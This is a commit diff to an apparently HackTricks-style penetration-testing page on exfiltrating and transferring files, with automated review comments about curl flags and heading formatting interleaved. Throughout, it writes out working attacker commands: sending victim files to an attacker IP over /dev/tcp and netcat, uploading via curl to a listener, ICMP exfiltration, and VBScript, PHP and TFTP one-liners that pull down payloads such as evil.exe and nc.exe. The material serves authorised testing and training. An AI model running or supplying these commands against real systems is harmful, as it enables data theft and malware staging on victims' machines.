Add exfiltration HTTP upload file module
+ Enhance layout
parent
3b21650868
commit
9a964a3bc7
@ -17,7 +17,7 @@
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
### Copy\&Paste Base64
|
||||
## Copy\&Paste Base64
|
||||
|
||||
**Linux**
|
||||
|
||||
@ -33,7 +33,7 @@ certutil -encode payload.dll payload.b64
|
||||
certutil -decode payload.b64 payload.dll
|
||||
```
|
||||
|
||||
### HTTP
|
||||
## HTTP
|
||||
|
||||
**Linux**
|
||||
|
||||
@ -61,13 +61,25 @@ Start-BitsTransfer -Source $url -Destination $output
|
||||
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
||||
```
|
||||
|
||||
#### Upload files
|
||||
### Upload files
|
||||
|
||||
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
|
||||
- [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
|
||||
- [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
|
||||
- Python module [uploadserver](https://pypi.org/project/uploadserver/):
|
||||
```bash
|
||||
# Listen to files
|
||||
python3 -m pip install --user uploadserver
|
||||
python3 -m uploadserver
|
||||
# With basic auth:
|
||||
# python3 -m uploadserver --basic-auth hello:world
|
||||
|
||||
[**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)\*\*\*\*
|
||||
# Send a file
|
||||
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
|
||||
# With basic auth:
|
||||
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
|
||||
```
|
||||
|
||||
#### **HTTPS Server**
|
||||
### **HTTPS Server**
|
||||
|
||||
```python
|
||||
# from https://gist.github.com/dergachev/7028596
|
||||
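Review bot: In the added "# Send a file" commands, `-H` is given no header value, so curl takes `-F` as the header string and treats `'files=@file.txt'` as a second URL; no multipart upload is sent. Drop `-H` from both lines, i.e. `curl -X POST http://HOST/upload -F 'files=@file.txt'` (`-X POST` is also redundant, since `-F` already implies POST). The `--basic-auth hello:world` variant is shown against a plain `http://` URL, so the credentials travel in cleartext; a one-line comment saying so next to the "With basic auth" lines would help. "# Listen to files" would read better as "# Listen for uploads".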
@ -110,23 +122,23 @@ if __name__ == "__main__":
|
||||
###
|
||||
```
|
||||
|
||||
### FTP
|
||||
## FTP
|
||||
|
||||
#### FTP server (python)
|
||||
### FTP server (python)
|
||||
|
||||
```bash
|
||||
pip3 install pyftpdlib
|
||||
python3 -m pyftpdlib -p 21
|
||||
```
|
||||
|
||||
#### FTP server (NodeJS)
|
||||
### FTP server (NodeJS)
|
||||
|
||||
```
|
||||
sudo npm install -g ftp-srv --save
|
||||
ftp-srv ftp://0.0.0.0:9876 --root /tmp
|
||||
```
|
||||
|
||||
#### FTP server (pure-ftp)
|
||||
### FTP server (pure-ftp)
|
||||
|
||||
```bash
|
||||
apt-get update && apt-get install pure-ftp
|
||||
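Review bot: The code fence under the promoted `### FTP server (NodeJS)` heading has no language tag, while the python and pure-ftp blocks beside it open with a `bash`-tagged fence. Since this hunk already touches all three headings for layout, tag that fence as `bash` too so the three server blocks render consistently.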
@ -146,7 +158,7 @@ chown -R ftpuser:ftpgroup /ftphome/
|
||||
/etc/init.d/pure-ftpd restart
|
||||
```
|
||||
|
||||
#### **Windows** client
|
||||
### **Windows** client
|
||||
|
||||
```bash
|
||||
#Work well with python. With pure-ftp use fusr:ftp
|
||||
@ -164,7 +176,7 @@ ftp -n -v -s:ftp.txt
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
### SMB
|
||||
## SMB
|
||||
|
||||
Kali as server
|
||||
|
||||
@ -202,7 +214,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
|
||||
WindPS-2> cd new_disk:
|
||||
```
|
||||
|
||||
### SCP
|
||||
## SCP
|
||||
|
||||
The attacker has to have SSHd running.
|
||||
|
||||
@ -210,7 +222,7 @@ The attacker has to have SSHd running.
|
||||
scp <username>@<Attacker_IP>:<directory>/<filename>
|
||||
```
|
||||
|
||||
### SSHFS
|
||||
## SSHFS
|
||||
|
||||
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
|
||||
|
||||
@ -220,23 +232,23 @@ sudo mkdir /mnt/sshfs
|
||||
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
|
||||
```
|
||||
|
||||
### NC
|
||||
## NC
|
||||
|
||||
```bash
|
||||
nc -lvnp 4444 > new_file
|
||||
nc -vn <IP> 4444 < exfil_file
|
||||
```
|
||||
|
||||
### /dev/tcp
|
||||
## /dev/tcp
|
||||
|
||||
#### Download file from victim
|
||||
### Download file from victim
|
||||
|
||||
```bash
|
||||
nc -lvnp 80 > file #Inside attacker
|
||||
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
|
||||
```
|
||||
|
||||
#### Upload file to victim
|
||||
### Upload file to victim
|
||||
|
||||
```bash
|
||||
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
|
||||
@ -247,7 +259,7 @@ cat <&6 > file.txt
|
||||
|
||||
thanks to **@BinaryShadow\_**
|
||||
|
||||
### **ICMP**
|
||||
## **ICMP**
|
||||
|
||||
```bash
|
||||
# To exfiltrate the content of a file via pings you can do:
|
||||
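Review bot: The promoted heading `## **ICMP**` keeps bold markers inside the heading, while sibling headings changed in the same commit (`## NC`, `## /dev/tcp`, `## SMB`) are plain. As the line is being rewritten anyway, drop the `**` so it reads `## ICMP`; the same applies to `## **SMTP**` and `### **HTTPS Server**` elsewhere in this patch.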
@ -267,7 +279,7 @@ def process_packet(pkt):
|
||||
sniff(iface="tun0", prn=process_packet)
|
||||
```
|
||||
|
||||
### **SMTP**
|
||||
## **SMTP**
|
||||
|
||||
If you can send data to an SMTP server, you can create an SMTP to receive the data with python:
|
||||
|
||||
@ -275,7 +287,7 @@ If you can send data to an SMTP server, you can create an SMTP to receive the da
|
||||
sudo python -m smtpd -n -c DebuggingServer :25
|
||||
```
|
||||
|
||||
### TFTP
|
||||
## TFTP
|
||||
|
||||
By default in XP and 2003 (in others it needs to be explicitly added during installation)
|
||||
|
||||
@ -301,7 +313,7 @@ In **victim**, connect to the Kali server:
|
||||
tftp -i <KALI-IP> get nc.exe
|
||||
```
|
||||
|
||||
### PHP
|
||||
## PHP
|
||||
|
||||
Download a file with a PHP oneliner:
|
||||
|
||||
@ -309,7 +321,7 @@ Download a file with a PHP oneliner:
|
||||
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
|
||||
```
|
||||
|
||||
### VBScript
|
||||
## VBScript
|
||||
|
||||
```bash
|
||||
Attacker> python -m SimpleHTTPServer 80
|
||||
@ -349,7 +361,7 @@ echo ts.Close >> wget.vbs
|
||||
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
|
||||
```
|
||||
|
||||
### Debug.exe
|
||||
## Debug.exe
|
||||
|
||||
This is a crazy technique that works on Windows 32 bit machines. The idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
|
||||
|
||||
@ -367,7 +379,7 @@ wine exe2bat.exe nc.exe nc.txt
|
||||
|
||||
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
|
||||
|
||||
### DNS
|
||||
## DNS
|
||||
|
||||
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
|
||||
|
||||
|